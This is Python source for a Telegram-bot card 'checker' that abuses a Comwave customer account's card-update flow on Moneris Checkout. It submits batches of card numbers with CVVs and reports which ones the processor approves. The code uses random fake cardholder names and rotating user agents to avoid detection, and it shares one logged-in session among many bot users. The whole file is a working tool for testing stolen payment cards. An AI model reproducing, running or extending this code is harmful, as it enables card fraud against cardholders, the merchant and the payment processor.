""" Comwave $0 Auth Gateway — Account portal card update via Moneris Checkout v1. Single shared session, serialized ticket step, parallel Moneris processing. """ import asyncio import httpx import random import time import os import logging from fake_useragent import UserAgent logger = logging.getLogger("comwave_auth") def get(s, start, end): try: start_index = s.index(start) + len(start) end_index = s.index(end, start_index) return s[start_index:end_index] except ValueError: return "" MONERIS_URL = "https://gateway.moneris.com/chkt/display" IDLE_TIMEOUT = 300 KEEPALIVE_INTERVAL = 120 RATE_LIMIT_SECONDS = 3 env_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ".env") CW_USER = "" CW_PASS = "" if os.path.exists(env_path): for line in open(env_path): line = line.strip() if line.startswith("COMWAVE_USERNAME="): CW_USER = line.split("=", 1)[1] elif line.startswith("COMWAVE_PASSWORD="): CW_PASS = line.split("=", 1)[1] class ComwaveChecker: """ Shared single-session Comwave checker for multi-user Telegram bot. - One login shared by all users. No repeated login/logout. - _ticket_lock serializes the fast ticket step (~0.5s each). - Moneris validate+process runs in parallel — no lock needed. - Background tasks: idle auto-logout (5min) + keepalive ping (2min). - Per-user rate limit prevents spam. - Auto re-login on any session failure. """ def __init__(self): self.session: httpx.AsyncClient | None = None self.hdrs: dict = {} self.logged_in: bool = False self._ticket_lock = asyncio.Lock() self._login_lock = asyncio.Lock() self._last_activity: float = 0 self._user_cooldowns: dict[int | str, float] = {} self._bg_task: asyncio.Task | None = None self._pending: int = 0 def _start_bg(self): if self._bg_task is None or self._bg_task.done(): self._bg_task = asyncio.create_task(self._bg_loop()) async def _bg_loop(self): while True: await asyncio.sleep(30) if not self.logged_in: break idle = time.time() - self._last_activity if idle >= IDLE_TIMEOUT and self._pending == 0: logger.info("Idle timeout — logging out") await self._do_logout() break if idle >= KEEPALIVE_INTERVAL: try: await self.session.get( "https://myaccount.comwave.net/viewPayment", headers={**self.hdrs, "Accept": "text/html"}, follow_redirects=True, ) except Exception: logger.warning("Keepalive ping failed — marking session dead") self.logged_in = False break async def ensure_login(self) -> bool: if self.logged_in and self.session: return True async with self._login_lock: if self.logged_in and self.session: return True return await self._do_login() async def _do_login(self) -> bool: if self.session: try: await self.session.aclose() except Exception: pass self.session = httpx.AsyncClient(timeout=40) ua_str = UserAgent().random self.hdrs = {"User-Agent": ua_str, "Accept-Language": "en-US,en;q=0.9"} for attempt in range(2): try: r1 = await self.session.get( "https://myaccount.comwave.net/welcome", headers={**self.hdrs, "Accept": "text/html"}, follow_redirects=True, ) ct = get(r1.text, 'name="currentTime" value="', '"') fa = get(r1.text, 'action="', '"') if not ct or not fa: return False r2 = await self.session.post( f"https://myaccount.comwave.net{fa}", data={"username": CW_USER, "password": CW_PASS, "currentTime": ct}, headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", "Referer": "https://myaccount.comwave.net/welcome"}, follow_redirects=True, ) if "already logged in" in r2.text: await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) await asyncio.sleep(2) continue if "Login" in (get(r2.text, "", "") or "Login"): return False self.logged_in = True self._last_activity = time.time() self._start_bg() logger.info("Logged in to Comwave") return True except Exception as e: logger.warning(f"Login attempt {attempt + 1} failed: {e}") await asyncio.sleep(2) return False async def _do_logout(self): if self.session: try: await self.session.get("https://myaccount.comwave.net/logoff", follow_redirects=True) except Exception: pass try: await self.session.aclose() except Exception: pass self.session = None self.logged_in = False logger.info("Logged out of Comwave") async def _get_ticket(self) -> tuple[str, str]: r = await self.session.post( "https://myaccount.comwave.net/toUpdatePayment", data={"formBean.updateCreditCardButton": "updateCC"}, headers={**self.hdrs, "Content-Type": "application/x-www-form-urlencoded", "Referer": "https://myaccount.comwave.net/viewPayment"}, follow_redirects=True, ) ticket = get(r.text, "monerisCheckoutTicketID = '", "'") redirect_url = str(r.url) return ticket, redirect_url async def _moneris_process(self, cc, mm, yyyy, cvv, ticket, redirect_url) -> str: first_names = ["James", "John", "Robert", "Michael", "William", "David"] last_names = ["Smith", "Johnson", "Williams", "Brown", "Jones", "Garcia"] first_name = random.choice(first_names) last_name = random.choice(last_names) expiry = f"{mm}{yyyy[2:]}" ua_str = self.hdrs["User-Agent"] mon = httpx.AsyncClient(timeout=30, follow_redirects=True) try: await mon.get(f"{MONERIS_URL}/index.php?tck={ticket}", headers={"User-Agent": ua_str, "Accept": "text/html"}) mon_hdrs = { "User-Agent": ua_str, "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Referer": f"{MONERIS_URL}/index.php?tck={ticket}", } form_data = { "ticket": ticket, "action": "validate_transaction", "pan": cc, "expiry_date": expiry, "cvv": cvv, "cardholder": f"{first_name} {last_name}", "card_data_key": "new", "currency_code": "CAD", "wallet_details": "{}", "gift_details": "{}", } rv = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) if rv.json().get("response", {}).get("success") != "true": return "Error: validate failed" form_data["action"] = "process_transaction" rp = await mon.post(f"{MONERIS_URL}/request.php", data=form_data, headers=mon_hdrs) resp = rp.json().get("response", {}) if resp.get("success") != "true": return "Error: process failed" result = resp.get("result", "") card_type = "" last4 = "" approval_code = "" ref_no = "" payments = resp.get("payment", []) if payments: p = payments[0] card_type = p.get("card", "") last4 = p.get("pan", "") approval_code = p.get("approval_code", "") ref_no = p.get("reference_no", "") info = f"[{card_type}] | Last4: {last4} | Auth: {approval_code} | Ref: {ref_no}" if result == "a": if "monerischeckout" in redirect_url: base = redirect_url.split("?")[0] await self.session.post(base, data={"ticketID": ticket}, headers={ **self.hdrs, "Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json", }) return f"APPROVED {info}" else: return f"DECLINED {info}" finally: await mon.aclose() def check_rate_limit(self, user_id: int | str) -> float: now = time.time() last = self._user_cooldowns.get(user_id, 0) remaining = RATE_LIMIT_SECONDS - (now - last) return max(0, remaining) def _touch_rate(self, user_id: int | str): self._user_cooldowns[user_id] = time.time() async def check_card(self, full: str, user_id: int | str = 0) -> str: start = time.time() wait = self.check_rate_limit(user_id) if wait > 0: return f"Rate limited — wait {round(wait, 1)}s" self._touch_rate(user_id) try: cc, mm, yyyy, cvv = full.strip().split("|") if len(yyyy) == 2: yyyy = f"20{yyyy}" except ValueError: return "Error: bad format (cc|mm|yyyy|cvv)" self._pending += 1 try: if not await self.ensure_login(): self.logged_in = False if not await self.ensure_login(): return "Error: login failed" self._last_activity = time.time() async with self._ticket_lock: try: ticket, redirect_url = await self._get_ticket() except Exception: ticket, redirect_url = "", "" if not ticket: self.logged_in = False if not await self.ensure_login(): return "Error: re-login failed" async with self._ticket_lock: try: ticket, redirect_url = await self._get_ticket() except Exception: ticket, redirect_url = "", "" if not ticket: return "Error: no ticket" result = await self._moneris_process(cc, mm, yyyy, cvv, ticket, redirect_url) elapsed = round(time.time() - start, 2) return f"{result} - Taken {elapsed}s" except Exception as e: return f"Error: {e}" finally: self._pending -= 1 @property def status(self) -> str: if self.logged_in: idle = round(time.time() - self._last_activity) if self._last_activity else 0 return f"🟢 Session active | {self._pending} pending | idle {idle}s" return "🔴 Session inactive" async def shutdown(self): if self._bg_task and not self._bg_task.done(): self._bg_task.cancel() await self._do_logout() checker = ComwaveChecker()